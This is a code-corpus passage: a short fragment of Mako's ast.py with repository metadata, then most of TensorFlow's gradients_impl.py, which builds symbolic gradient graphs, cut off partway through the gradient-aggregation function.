class FunctionArgs(FunctionDecl):
"""the argument portion of a function declaration"""
def __init__(self, code, **kwargs):
super(FunctionArgs, self).__init__("def ANON(%s):pass" % code,
**kwargs)
|
znoland3/zachdemo
|
venvdir/lib/python3.4/site-packages/mako/ast.py
|
Python
|
mit
| 6,635
|
[
"VisIt"
] |
7c2bd362e0239fef1f285a3fff450e92b060e4ddeb5c5241204fb77aeaf8dc23
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implements the graph generation for computation of gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import sys
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_grad # pylint: disable=unused-import
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops # pylint: disable=unused-import
from tensorflow.python.ops import cond_v2_impl
from tensorflow.python.ops import control_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import image_grad # pylint: disable=unused-import
from tensorflow.python.ops import linalg_grad # pylint: disable=unused-import
from tensorflow.python.ops import linalg_ops # pylint: disable=unused-import
from tensorflow.python.ops import logging_ops # pylint: disable=unused-import
from tensorflow.python.ops import manip_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_grad # pylint: disable=unused-import
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import spectral_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import tf_export
# This is to avoid a circular dependency with cond_v2_impl.
cond_v2_impl._gradients_impl = sys.modules[__name__] # pylint: disable=protected-access
# Warn the user if we convert a sparse representation to dense with at
# least this number of elements.
_LARGE_SPARSE_NUM_ELEMENTS = 100000000
def _IndexedSlicesToTensor(value, dtype=None, name=None, as_ref=False):
"""Converts an IndexedSlices object `value` to a Tensor.
NOTE(mrry): This function is potentially expensive.
Args:
value: An ops.IndexedSlices object.
dtype: The dtype of the Tensor to be returned.
name: Optional name to use for the returned Tensor.
as_ref: True if a ref is requested.
Returns:
A dense Tensor representing the values in the given IndexedSlices.
Raises:
ValueError: If the IndexedSlices does not have the same dtype.
"""
_ = as_ref
if dtype and not dtype.is_compatible_with(value.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for IndexedSlices with dtype %s" %
(dtype.name, value.dtype.name))
if value.dense_shape is None:
raise ValueError(
"Tensor conversion requested for IndexedSlices without dense_shape: %s"
% str(value))
# TODO(mrry): Consider adding static shape information to
# IndexedSlices, to avoid using numpy here.
if not context.executing_eagerly():
dense_shape_value = tensor_util.constant_value(value.dense_shape)
if dense_shape_value is not None:
num_elements = np.prod(dense_shape_value)
if num_elements >= _LARGE_SPARSE_NUM_ELEMENTS:
warnings.warn(
"Converting sparse IndexedSlices to a dense Tensor with %d "
"elements. This may consume a large amount of memory." %
num_elements)
else:
warnings.warn(
"Converting sparse IndexedSlices to a dense Tensor of unknown shape. "
"This may consume a large amount of memory.")
return math_ops.unsorted_segment_sum(
value.values, value.indices, value.dense_shape[0], name=name)
ops.register_tensor_conversion_function(ops.IndexedSlices,
_IndexedSlicesToTensor)
def _MarkReachedOps(from_ops, reached_ops, func_graphs):
"""Mark all ops reached from "from_ops".
Args:
from_ops: list of Operations.
reached_ops: set of Operations.
func_graphs: list of function._FuncGraphs. This method will traverse through
these functions if they capture from_ops or any reachable ops.
"""
queue = collections.deque()
queue.extend(from_ops)
while queue:
op = queue.popleft()
if op not in reached_ops:
reached_ops.add(op)
for output in op.outputs:
if _IsBackpropagatable(output):
queue.extend(_Consumers(output, func_graphs))
def _PendingCount(to_ops, from_ops, colocate_gradients_with_ops, func_graphs,
xs):
"""Initialize the pending count for ops between two lists of Operations.
'pending_count[op]' indicates the number of backprop inputs
to this operation.
Args:
to_ops: list of Operations.
from_ops: list of Operations.
colocate_gradients_with_ops: Python bool. See docstring of gradients().
func_graphs: list of function._FuncGraphs. This method will traverse through
these functions if they capture from_ops or any reachable ops. This is
useful if to_ops occur in a function and from_ops are in an outer function
or graph.
xs: list of Tensors.
Returns:
A tuple containing: (1) the subset of to_ops reachable from from_ops by a
path of zero or more backpropagatable tensors, (2) a mapping from operation
to the number of backprop inputs to that op, and (3) a ControlFlowState
object which is not None if the ops between from_ops and to_ops contain
control flow loops.
"""
# Mark reachable ops from from_ops.
reached_ops = set()
_MarkReachedOps(from_ops, reached_ops, func_graphs)
# X in reached_ops iff X is reachable from from_ops by a path of zero or more
# backpropagatable tensors.
reachable_to_ops = set(op for op in to_ops if op in reached_ops)
# Mark between ops.
between_ops = set()
between_op_list = []
queue = collections.deque()
queue.extend(to_ops)
while queue:
op = queue.popleft()
# We are interested in this op.
if op in reached_ops:
between_ops.add(op)
between_op_list.append(op)
# Clear the boolean so we won't add the inputs again.
reached_ops.remove(op)
for inp in _Inputs(op, xs):
queue.append(inp.op)
# X in between_ops iff X is on a path of zero or more backpropagatable tensors
# between from_ops and to_ops
# 'loop_state' is None if there are no while loops.
loop_state = control_flow_ops.MaybeCreateControlFlowState(
between_op_list, between_ops, colocate_gradients_with_ops)
# Initialize pending count for between ops.
pending_count = collections.defaultdict(int)
for op in between_op_list:
for x in _Inputs(op, xs):
if x.op in between_ops:
pending_count[x.op] += 1
return reachable_to_ops, pending_count, loop_state
def _AsList(x):
return x if isinstance(x, (list, tuple)) else [x]
def _DefaultGradYs(grad_ys,
ys,
colocate_gradients_with_ops,
gradient_uid="__unsupported__"):
"""Fill in default values for grad_ys.
Args:
grad_ys: List of gradients, can contain None.
ys: List of tensors.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
gradient_uid: A unique identifier within the graph indicating
which invocation of gradients is being executed. Used to cluster
ops for compilation.
Returns:
A list of gradients to use, without None.
Raises:
ValueError: If sizes of gradients and inputs don't match
TypeError: If type of any gradient is not valid for its input.
"""
if len(grad_ys) != len(ys):
raise ValueError("Passed %d grad_ys for %d ys" % (len(grad_ys), len(ys)))
grad_ys = ops.convert_n_to_tensor_or_indexed_slices(grad_ys, name="grad_y")
new_grad_ys = []
for i in xrange(len(grad_ys)):
grad_y = grad_ys[i]
y = ys[i]
with _maybe_colocate_with(y.op, gradient_uid, colocate_gradients_with_ops):
if grad_y is None:
if y.dtype.is_complex:
raise TypeError(
"Gradients of complex tensors must set grad_ys (y.dtype = %r)" %
y.dtype)
new_grad_ys.append(
array_ops.fill(
array_ops.shape(y),
constant_op.constant(1, dtype=y.dtype, name="grad_ys_%d" % i)))
continue
if y.dtype.is_floating or y.dtype.is_integer:
if not grad_y.dtype.is_floating and not grad_y.dtype.is_integer:
raise TypeError(
"Gradient type %s generated for real or "
"integer-valued tensor %s with type %s must be "
"real or integer" % (dtypes.as_dtype(grad_y.dtype).name, y,
dtypes.as_dtype(y.dtype).name))
elif y.dtype.is_complex:
if not grad_y.dtype.is_complex:
raise TypeError(
"Gradient type %s generated for complex-valued "
"tensor %s with type %s must be real" % (dtypes.as_dtype(
grad_y.dtype).name, y, dtypes.as_dtype(y.dtype).name))
else:
raise TypeError(
"Tensor %s with type %s must be numeric "
"to obtain a default gradient" % (y, dtypes.as_dtype(y.dtype).name))
# Create a grad_y tensor in the name scope of the gradient.
# Required for TensorArrays to identify which gradient call a
# grad_y value is coming from.
if isinstance(grad_y, ops.IndexedSlices):
new_grad_ys.append(
ops.IndexedSlices(
indices=(array_ops.identity(
grad_y.indices, name="grad_ys_%d_indices" % i)
if isinstance(grad_y.indices, ops.Tensor) else
grad_y.indices),
values=(array_ops.identity(
grad_y.values, name="grad_ys_%d_values" % i) if isinstance(
grad_y.values, ops.Tensor) else grad_y.values),
dense_shape=(array_ops.identity(
grad_y.dense_shape, name="grad_ys_%d_shape" % i)
if isinstance(grad_y.dense_shape, ops.Tensor) else
grad_y.dense_shape)))
else:
new_grad_ys.append(array_ops.identity(grad_y, name="grad_ys_%d" % i))
return new_grad_ys
def _IsTrainable(tensor):
dtype = dtypes.as_dtype(tensor.dtype)
return dtype.base_dtype in (dtypes.float16, dtypes.float32, dtypes.float64,
dtypes.complex64, dtypes.complex128,
dtypes.resource)
def _IsBackpropagatable(tensor):
if _IsTrainable(tensor):
return True
dtype = dtypes.as_dtype(tensor.dtype)
return dtype.base_dtype in (dtypes.bfloat16, dtypes.resource, dtypes.variant)
def _VerifyGeneratedGradients(grads, op):
"""Verify that gradients are valid in number and type.
Args:
grads: List of generated gradients.
op: Operation for which the gradients where generated.
Raises:
ValueError: if sizes of gradients and inputs don't match.
TypeError: if type of any gradient is not valid for its input.
"""
if len(grads) != len(op.inputs):
raise ValueError("Num gradients %d generated for op %s do not match num "
"inputs %d" % (len(grads), op.node_def, len(op.inputs)))
def _StopOps(from_ops, stop_gradient_ops, pending_count, xs):
"""The set of ops that terminate the gradient computation.
This computes the frontier of the forward graph *before* which backprop
should stop. Operations in the returned set will not be differentiated.
This set is defined as the subset of `from_ops` containing ops that have
no predecessor in `from_ops`. `pending_count` is the result of
`_PendingCount(xs, from_ops)`. An 'op' has predecessors in `from_ops`
iff pending_count[op] > 0.
In addition, none of `stop_gradient_ops` will be differentiated.
Args:
from_ops: list of Operations.
stop_gradient_ops: list of Operations never to backprop through.
pending_count: mapping from operation to number of backprop inputs.
xs: list of Tensors.
Returns:
The set of operations.
"""
stop_ops = set()
for op in from_ops:
is_stop_op = True
for inp in _Inputs(op, xs):
if pending_count[inp.op] > 0:
is_stop_op = False
break
if is_stop_op:
stop_ops.add(op)
stop_ops.update(op for op in stop_gradient_ops)
return stop_ops
@contextlib.contextmanager
def _maybe_colocate_with(op, gradient_uid, colocate_gradients_with_ops): # pylint: disable=invalid-name
"""Context to colocate with `op` if `colocate_gradients_with_ops`."""
if colocate_gradients_with_ops:
with ops._colocate_with_for_gradient(op, gradient_uid): # pylint: disable=protected-access
yield
else:
yield
def _SymGrad(op, out_grads, xs):
"""Backprop through a function call node op given its outputs' gradients."""
f_in = [x for x in _Inputs(op, xs)] + out_grads
f_types = [x.dtype for x in _Inputs(op, xs)]
f = attr_value_pb2.NameAttrList()
f.name = op.type
for k in op.node_def.attr:
f.attr[k].CopyFrom(op.node_def.attr[k])
# TODO(apassos) use a better dtype here
in_grads = functional_ops.symbolic_gradient(
input=f_in,
Tout=[x if x != dtypes.resource else dtypes.float32 for x in f_types],
f=f)
return in_grads
def _MaybeCompile(scope, op, func, grad_fn):
"""Compile the calculation in grad_fn if op was marked as compiled."""
scope = scope.rstrip("/").replace("/", "_")
if func is not None:
xla_compile = func.definition.attr["_XlaCompile"].b
xla_separate_compiled_gradients = func.definition.attr[
"_XlaSeparateCompiledGradients"].b
xla_scope = func.definition.attr["_XlaScope"].s.decode()
else:
try:
xla_compile = op.get_attr("_XlaCompile")
xla_separate_compiled_gradients = op.get_attr(
"_XlaSeparateCompiledGradients")
xla_scope = op.get_attr("_XlaScope").decode()
except ValueError:
return grad_fn() # Exit early
if not xla_compile:
return grad_fn() # Exit early
# If the gradients are supposed to be compiled separately, we give them a
# _XlaScope name that is based on the name_scope of the gradients. Otherwise
# they just inherit the existing _XlaScope name, which lets them be merged
# together with the non-gradient computation.
if xla_separate_compiled_gradients:
xla_grad_scope = "%s_grad_%s" % (xla_scope, scope)
else:
xla_grad_scope = xla_scope
attrs = {
"_XlaCompile": attr_value_pb2.AttrValue(b=xla_compile),
"_XlaScope": attr_value_pb2.AttrValue(s=xla_grad_scope.encode())
}
with ops.get_default_graph()._attr_scope(attrs): # pylint: disable=protected-access
return grad_fn()
def _RaiseNoGradWrtInitialLoopValError(op, from_ops, xs):
"""Raises an error if we backprop through a loop var."""
# Find the nearest 'to_op' reachable from 'op' to provide a more helpful error
# message.
target_op = None
queue = collections.deque([op])
visited = set()
while queue:
curr_op = queue.popleft()
if curr_op in visited: continue
visited.add(curr_op)
if curr_op in from_ops:
target_op = curr_op
break
queue.extend(t.op for t in _Inputs(curr_op, xs))
assert target_op
raise ValueError(
"Cannot compute gradient inside while loop with respect to op '%s'. "
"We do not support taking the gradient wrt or through the initial value "
"of a loop variable. Gradients can be computed through loop invariants "
"or wrt the input parameters to the loop body."
% target_op.name)
def _MaybeCaptured(t):
"""If t is a captured value placeholder, returns the original captured value.
Args:
t: Tensor
Returns:
A tensor, potentially from a different Graph/function._FuncGraph.
"""
# pylint: disable=protected-access
if isinstance(t.op.graph, function._FuncGraph) and t.op.type == "Placeholder":
for input_t, placeholder_t in t.op.graph._captured.items():
if t == placeholder_t:
return _MaybeCaptured(input_t)
# pylint: enable=protected-access
return t
# TODO(skyewm): plumbing xs through everywhere is ugly, consider making
# _GradientsHelper a class with xs as a member variable.
def _Inputs(op, xs):
"""Returns the inputs of op, crossing closure boundaries where necessary.
Args:
op: Operation
xs: list of Tensors we are differentiating w.r.t.
Returns:
A list of tensors. The tensors may be from multiple
Graph/function._FuncGraphs if op is in a function._FuncGraph and has
captured inputs.
"""
if isinstance(op.graph, function._FuncGraph): # pylint: disable=protected-access
# If we're differentiating w.r.t. `t`, do not attempt to traverse through it
# to a captured value. The algorithm needs to "see" `t` in this case, even
# if it's a function input for a captured value, whereas usually we'd like
# to traverse through these closures as if the captured value was the direct
# input to op.
return [t if (t in xs) else _MaybeCaptured(t) for t in op.inputs]
else:
return op.inputs
def _Consumers(t, func_graphs):
"""Returns the consumers of t, crossing closure boundaries where necessary.
Args:
t: Tensor
func_graphs: a list of function._FuncGraphs that may have captured t.
Returns:
A list of tensors. The tensors will be from the current graph and/or
func_graphs.
"""
consumers = t.consumers()
for func in func_graphs:
for input_t, placeholder in func._captured.items(): # pylint: disable=protected-access
if input_t == t:
consumers.extend(_Consumers(placeholder, func_graphs))
return consumers
@tf_export("gradients")
def gradients(ys,
xs,
grad_ys=None,
name="gradients",
colocate_gradients_with_ops=False,
gate_gradients=False,
aggregation_method=None,
stop_gradients=None):
"""Constructs symbolic derivatives of sum of `ys` w.r.t. x in `xs`.
`ys` and `xs` are each a `Tensor` or a list of tensors. `grad_ys`
is a list of `Tensor`, holding the gradients received by the
`ys`. The list must be the same length as `ys`.
`gradients()` adds ops to the graph to output the derivatives of `ys` with
respect to `xs`. It returns a list of `Tensor` of length `len(xs)` where
each tensor is the `sum(dy/dx)` for y in `ys`.
`grad_ys` is a list of tensors of the same length as `ys` that holds
the initial gradients for each y in `ys`. When `grad_ys` is None,
we fill in a tensor of '1's of the shape of y for each y in `ys`. A
user can provide their own initial `grad_ys` to compute the
derivatives using a different initial gradient for each y (e.g., if
one wanted to weight the gradient differently for each value in
each y).
`stop_gradients` is a `Tensor` or a list of tensors to be considered constant
with respect to all `xs`. These tensors will not be backpropagated through,
as though they had been explicitly disconnected using `stop_gradient`. Among
other things, this allows computation of partial derivatives as opposed to
total derivatives. For example:
```python
a = tf.constant(0.)
b = 2 * a
g = tf.gradients(a + b, [a, b], stop_gradients=[a, b])
```
Here the partial derivatives `g` evaluate to `[1.0, 1.0]`, compared to the
total derivatives `tf.gradients(a + b, [a, b])`, which take into account the
influence of `a` on `b` and evaluate to `[3.0, 1.0]`. Note that the above is
equivalent to:
```python
a = tf.stop_gradient(tf.constant(0.))
b = tf.stop_gradient(2 * a)
g = tf.gradients(a + b, [a, b])
```
`stop_gradients` provides a way of stopping gradient after the graph has
already been constructed, as compared to `tf.stop_gradient` which is used
during graph construction. When the two approaches are combined,
backpropagation stops at both `tf.stop_gradient` nodes and nodes in
`stop_gradients`, whichever is encountered first.
All integer tensors are considered constant with respect to all `xs`, as if
they were included in `stop_gradients`.
Args:
ys: A `Tensor` or list of tensors to be differentiated.
xs: A `Tensor` or list of tensors to be used for differentiation.
grad_ys: Optional. A `Tensor` or list of tensors the same size as
`ys` and holding the gradients computed for each y in `ys`.
name: Optional name to use for grouping all the gradient ops together.
defaults to 'gradients'.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
gate_gradients: If True, add a tuple around the gradients returned
for an operations. This avoids some race conditions.
aggregation_method: Specifies the method used to combine gradient terms.
Accepted values are constants defined in the class `AggregationMethod`.
stop_gradients: Optional. A `Tensor` or list of tensors not to differentiate
through.
Returns:
A list of `sum(dy/dx)` for each x in `xs`.
Raises:
LookupError: if one of the operations between `x` and `y` does not
have a registered gradient function.
ValueError: if the arguments are invalid.
RuntimeError: if called in Eager mode.
"""
# Creating the gradient graph for control flow mutates Operations.
# _mutation_lock ensures a Session.run call cannot occur between creating and
# mutating new ops.
with ops.get_default_graph()._mutation_lock(): # pylint: disable=protected-access
return _GradientsHelper(ys, xs, grad_ys, name, colocate_gradients_with_ops,
gate_gradients, aggregation_method, stop_gradients)
def _GradientsHelper(ys,
xs,
grad_ys=None,
name="gradients",
colocate_gradients_with_ops=False,
gate_gradients=False,
aggregation_method=None,
stop_gradients=None,
src_graph=None):
"""Implementation of gradients()."""
if context.executing_eagerly():
raise RuntimeError("tf.gradients is not supported when eager execution "
"is enabled. Use tf.GradientTape instead.")
if src_graph is None:
src_graph = ops.get_default_graph()
# If src_graph is a _FuncGraph (i.e. a function body), gather it and all
# ancestor graphs. This is necessary for correctly handling captured values.
func_graphs = []
curr_graph = src_graph
while isinstance(curr_graph, function._FuncGraph): # pylint: disable=protected-access
func_graphs.append(curr_graph)
curr_graph = curr_graph._outer_graph # pylint: disable=protected-access
ys = _AsList(ys)
xs = _AsList(xs)
stop_gradients = [] if stop_gradients is None else _AsList(stop_gradients)
if grad_ys is None:
grad_ys = [None] * len(ys)
else:
grad_ys = _AsList(grad_ys)
with ops.name_scope(
name, "gradients",
list(ys) + list(xs) + list(stop_gradients) + list(grad_ys)) as grad_scope:
# Get a uid for this call to gradients that can be used to help
# cluster ops for compilation.
gradient_uid = ops.get_default_graph().unique_name("uid")
ys = ops.convert_n_to_tensor_or_indexed_slices(ys, name="y")
xs = [
x.handle if resource_variable_ops.is_resource_variable(x) else x
for x in xs
]
xs = ops.internal_convert_n_to_tensor_or_indexed_slices(
xs, name="x", as_ref=True)
grad_ys = _DefaultGradYs(grad_ys, ys, colocate_gradients_with_ops,
gradient_uid)
# The approach we take here is as follows: Create a list of all ops in the
# subgraph between the ys and xs. Visit these ops in reverse order of ids
# to ensure that when we visit an op the gradients w.r.t its outputs have
# been collected. Then aggregate these gradients if needed, call the op's
# gradient function, and add the generated gradients to the gradients for
# its input.
# Initialize the pending count for ops in the connected subgraph from ys
# to the xs.
if len(ys) > 1:
ys = [array_ops.identity(y) if _Consumers(y, func_graphs) else y
for y in ys]
to_ops = [t.op for t in ys]
from_ops = [t.op for t in xs]
stop_gradient_ops = [t.op for t in stop_gradients]
reachable_to_ops, pending_count, loop_state = _PendingCount(
to_ops, from_ops, colocate_gradients_with_ops, func_graphs, xs)
# Iterate over the collected ops.
#
# grads: op => list of gradients received on each output endpoint of the
# op. The gradients for each endpoint are initially collected as a list.
# When it is time to call the op's gradient function, for each endpoint we
# aggregate the list of received gradients into a Add() Operation if there
# is more than one.
grads = {}
# Add the initial gradients for the ys.
for y, grad_y in zip(ys, grad_ys):
_SetGrad(grads, y, grad_y)
# Initialize queue with to_ops.
queue = collections.deque()
# Add the ops in 'to_ops' into the queue.
to_ops_set = set()
for op in to_ops:
# 'ready' handles the case where one output gradient relies on
# another output's gradient.
ready = (pending_count[op] == 0)
if ready and op not in to_ops_set and op in reachable_to_ops:
to_ops_set.add(op)
queue.append(op)
if loop_state:
loop_exits = loop_state.ProcessUnusedLoopExits(pending_count, to_ops_set)
for y in loop_exits:
if _IsTrainable(y):
_SetGrad(grads, y, loop_state.ZerosLikeForExit(y))
queue.append(y.op)
stop_ops = _StopOps(from_ops, stop_gradient_ops, pending_count, xs)
while queue:
# generate gradient subgraph for op.
op = queue.popleft()
with _maybe_colocate_with(op, gradient_uid, colocate_gradients_with_ops):
if loop_state:
loop_state.EnterGradWhileContext(op, before=True)
out_grads = _AggregatedGrads(grads, op, gradient_uid, loop_state,
aggregation_method)
if loop_state:
loop_state.ExitGradWhileContext(op, before=True)
grad_fn = None
func_call = None
# pylint: disable=protected-access
is_func_call = src_graph._is_function(op.type)
# pylint: enable=protected-access
has_out_grads = any(isinstance(g, ops.Tensor) or g for g in out_grads)
if has_out_grads and (op not in stop_ops):
if is_func_call:
func_call = src_graph._get_function(op.type) # pylint: disable=protected-access
# Note that __defun is not set if the graph is
# imported. If it's set, we prefer to access the original
# defun.
func_call = getattr(op, "__defun", func_call)
grad_fn = func_call.python_grad_func
else:
# A grad_fn must be defined, either as a function or as None
# for ops that do not have gradients.
try:
grad_fn = ops.get_gradient_function(op)
except LookupError:
raise LookupError(
"No gradient defined for operation '%s' (op type: %s)" %
(op.name, op.type))
if loop_state:
loop_state.EnterGradWhileContext(op, before=False)
# NOTE(skyewm): We don't support computing gradients wrt a loop variable
# unless it's within the context of a single iteration (i.e. the
# gradient is wrt to the loop parameter in the body function, not wrt or
# through the initial value). This means if we're in a while loop
# context, we should never see a switch node from this context.
# pylint: disable=protected-access
if (control_flow_util.IsSwitch(op) and
op._control_flow_context is not None and
op._control_flow_context.IsWhileContext() and
op._control_flow_context ==
ops.get_default_graph()._get_control_flow_context()):
_RaiseNoGradWrtInitialLoopValError(op, from_ops, xs)
# pylint: enable=protected-access
if (grad_fn or is_func_call) and has_out_grads:
# NOTE: If _AggregatedGrads didn't compute a value for the i'th
# output, it means that the cost does not depend on output[i],
# therefore dC/doutput[i] is 0.
for i, out_grad in enumerate(out_grads):
if (not isinstance(out_grad, ops.Tensor) and not out_grad) and (
(not grad_fn and is_func_call) or _IsTrainable(op.outputs[i])):
# Only trainable outputs or outputs for a function call that
# will use SymbolicGradient get a zero gradient. Gradient
# functions should ignore the gradient for other outputs.
# TODO(apassos) gradients of resource handles might be an
# issue here because of zeros.
if loop_state:
out_grads[i] = loop_state.ZerosLike(op, i)
else:
out_grads[i] = control_flow_ops.ZerosLikeOutsideLoop(op, i)
with ops.name_scope(op.name + "_grad"):
# pylint: disable=protected-access
with src_graph._original_op(op):
# pylint: enable=protected-access
if grad_fn:
# If grad_fn was found, do not use SymbolicGradient even for
# functions.
in_grads = _MaybeCompile(grad_scope, op, func_call,
lambda: grad_fn(op, *out_grads))
else:
# For function call ops, we add a 'SymbolicGradient'
# node to the graph to compute gradients.
in_grads = _MaybeCompile(grad_scope, op, func_call,
lambda: _SymGrad(op, out_grads, xs))
in_grads = _AsList(in_grads)
_VerifyGeneratedGradients(in_grads, op)
if gate_gradients and len([x for x in in_grads
if x is not None]) > 1:
with ops.device(None):
with ops._colocate_with_for_gradient( # pylint: disable=protected-access
None,
gradient_uid,
ignore_existing=True):
in_grads = control_flow_ops.tuple(in_grads)
_LogOpGradients(op, out_grads, in_grads)
else:
# If no grad_fn is defined or none of out_grads is available,
# just propagate a list of None backwards.
in_grads = [None] * len(_Inputs(op, xs))
for i, (t_in, in_grad) in enumerate(zip(_Inputs(op, xs), in_grads)):
if in_grad is not None:
if (isinstance(in_grad, ops.Tensor) and
t_in.dtype != dtypes.resource):
try:
in_grad.set_shape(t_in.get_shape())
except ValueError:
raise ValueError(
"Incompatible shapes between op input and calculated "
"input gradient. Forward operation: %s. Input index: %d. "
"Original input shape: %s. "
"Calculated input gradient shape: %s" %
(op.name, i, t_in.shape, in_grad.shape))
_SetGrad(grads, t_in, in_grad)
if loop_state:
loop_state.ExitGradWhileContext(op, before=False)
# Update pending count for the inputs of op and enqueue ready ops.
_UpdatePendingAndEnqueueReady(grads, op, queue, pending_count, loop_state,
xs)
if loop_state:
loop_state.PostProcessing()
return [_GetGrad(grads, x) for x in xs]
def _HasAnyNotNoneGrads(grads, op):
"""Return true iff op has real gradient."""
out_grads = _GetGrads(grads, op)
for out_grad in out_grads:
if isinstance(out_grad, (ops.Tensor, ops.IndexedSlices)):
return True
if out_grad and isinstance(out_grad, collections.Sequence):
if any([g is not None for g in out_grad]):
return True
return False
def _UpdatePendingAndEnqueueReady(grads, op, queue, pending_count, loop_state,
xs):
"""Update pending count for the inputs of op and enqueue ready ops."""
for x in _Inputs(op, xs):
pending_count[x.op] -= 1
ready = (pending_count[x.op] == 0)
if loop_state and not ready:
ready = pending_count[x.op] > 0 and control_flow_util.IsLoopSwitch(x.op)
if ready:
if control_flow_util.IsLoopExit(x.op):
# if x is an exit without real gradient, defer processing them.
grad_state = loop_state.GetGradState(x.op, before=False)
grad_state.deferred_exits.append(x)
grad_state.pending_exits_count -= 1
if grad_state.pending_exits_count == 0:
# We now have all the exits so process them.
has_not_none_grad = False
for y in grad_state.deferred_exits:
if _HasAnyNotNoneGrads(grads, y.op):
has_not_none_grad = True
queue.append(y.op)
else:
grad_state.unused_exits.append(y)
if has_not_none_grad:
# For an unused exit, if it has trainable outputs, backprop
# a zero gradient. Otherwise, just ignore it.
for y in grad_state.unused_exits:
if _IsTrainable(y):
_SetGrad(grads, y, loop_state.ZerosLikeForExit(y))
queue.append(y.op)
else:
# All exits are "unused" so use None as gradient.
for y in grad_state.unused_exits:
queue.append(y.op)
else:
queue.append(x.op)
def _SetGrad(grads, t, grad):
"""Sets gradient "grad" in "grads" for tensor "t"."""
op = t.op
op_grads = grads.get(op)
if not op_grads:
op_grads = [[] for _ in xrange(len(op.outputs))]
grads[op] = op_grads
t_grads = op_grads[t.value_index]
if isinstance(t_grads, list):
t_grads.append(grad)
else:
assert control_flow_util.IsLoopSwitch(op)
op_grads[t.value_index] = grad
def _GetGrad(grads, t):
"""Gets gradient for tensor "t"."""
op = t.op
op_grads = grads.get(op)
if not op_grads:
return None
t_grad = op_grads[t.value_index]
assert not isinstance(
t_grad, list), ("gradients list should have been aggregated by now.")
return t_grad
def _GetGrads(grads, op):
"""Gets all gradients for op."""
if op in grads:
return grads[op]
else:
return [[] for _ in xrange(len(op.outputs))]
def _HandleNestedIndexedSlices(grad):
assert isinstance(grad, ops.IndexedSlices)
if isinstance(grad.values, ops.Tensor):
return grad
else:
assert isinstance(grad.values, ops.IndexedSlices)
g = _HandleNestedIndexedSlices(grad.values)
return ops.IndexedSlices(g.values, array_ops.gather(
grad.indices, g.indices), g.dense_shape)
def _AccumulatorShape(inputs):
shape = tensor_shape.unknown_shape()
for i in inputs:
if isinstance(i, ops.Tensor):
shape = shape.merge_with(i.get_shape())
return shape
def _LogOpGradients(op, out_grads, in_grads):
"""Log the in and out grads of an op."""
logging.vlog(1, "Gradient for '" + op.name + "'")
def _FilterGrad(x):
if x is None:
return False
if isinstance(x, (list, tuple)):
return bool(x)
else:
return True
logging.vlog(1, " in --> %s",
", ".join([x.name for x in out_grads if _FilterGrad(x)]))
logging.vlog(1, " out --> %s",
", ".join([x.name for x in in_grads if _FilterGrad(x)]))
def _MultiDeviceAddN(tensor_list, gradient_uid):
"""Adds tensors from potentially multiple devices."""
# Basic function structure comes from control_flow_ops.group().
# Sort tensors according to their devices.
tensors_on_device = collections.defaultdict(lambda: [])
for tensor in tensor_list:
tensors_on_device[tensor.device].append(tensor)
# For each device, add the tensors on that device first.
# Then gather the partial sums from multiple devices.
# TODO(sjhwang): Create hierarchical aggregation tree as pbar's suggestion.
# E.g., aggregate per GPU, then per task, and so on.
summands = []
def DeviceKey(dev):
return "" if dev is None else dev
for dev in sorted(six.iterkeys(tensors_on_device), key=DeviceKey):
tensors = tensors_on_device[dev]
with ops._colocate_with_for_gradient( # pylint: disable=protected-access
tensors[0].op,
gradient_uid,
ignore_existing=True):
summands.append(math_ops.add_n(tensors))
return math_ops.add_n(summands)
@tf_export("AggregationMethod")
class AggregationMethod(object):
"""A class listing aggregation methods used to combine gradients.
Computing partial derivatives can require aggregating gradient
contributions. This class lists the various methods that can
be used to combine gradients in the graph:
* `ADD_N`: All of the gradient terms are summed as part of one
operation using the "AddN" op. It has the property that all
gradients must be ready before any aggregation is performed.
* `DEFAULT`: The system-chosen default aggregation method.
"""
ADD_N = 0
DEFAULT = ADD_N
# The following are experimental and may not be supported in future releases.
EXPERIMENTAL_TREE = 1
EXPERIMENTAL_ACCUMULATE_N = 2
def _AggregatedGrads(grads,
op,
gradient_uid,
loop_state,
aggregation_method=None):
"""Get the aggregated gradients for op.
Args:
grads: The map of memoized gradients.
op: The op to get gradients for.
gradient_uid: A unique identifier within the graph indicating
which invocation of gradients is being executed. Used to cluster
ops for compilation.
loop_state: An object for maintaining the state of the while loops in the
graph. It is of type ControlFlowState. None if the graph
contains no while loops.
aggregation_method: Specifies the method used to combine gradient terms.
Accepted values are constants defined in the class `AggregationMethod`.
Returns:
A list of gradients, one per each output of `op`. If the gradients
for a particular output is a list, this function aggregates it
before returning.
Raises:
TypeError: if the incoming grads are not Tensors or IndexedSlices.
ValueError: if the arguments are invalid.
"""
if aggregation_method is None:
aggregation_method = AggregationMethod.DEFAULT
if aggregation_method not in [
AggregationMethod.ADD_N, AggregationMethod.EXPERIMENTAL_TREE,
AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
]:
raise ValueError(
"Invalid aggregation_method specified %s." % aggregation_method)
out_grads = _GetGrads(grads, op)
